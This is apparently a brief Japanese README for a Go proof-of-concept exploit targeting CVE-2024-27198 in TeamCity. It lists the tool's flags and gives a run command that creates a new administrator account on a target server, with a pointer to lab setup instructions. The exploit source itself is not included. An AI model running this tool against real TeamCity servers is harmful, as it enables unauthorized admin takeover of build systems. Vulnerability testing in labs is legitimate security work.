
Goで書かれたCVE-2024-27198用のPoC

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-27198
go run CVE-2024-27198.go -h
-s string
TeamCity Server
-p string
New admin password
-u string
New admin username
-proxy
Proxy URL (optional)
go run CVE-2024-27198.go -s http://IP_OR_FQDN:PORT -u new_admin_username -p new_admin_password -proxy http://IP_OR_FQDN:PORT
ラボ環境のセットアップ手順については、https://github.com/yoryio/CVE-2024-27198 を参照してください。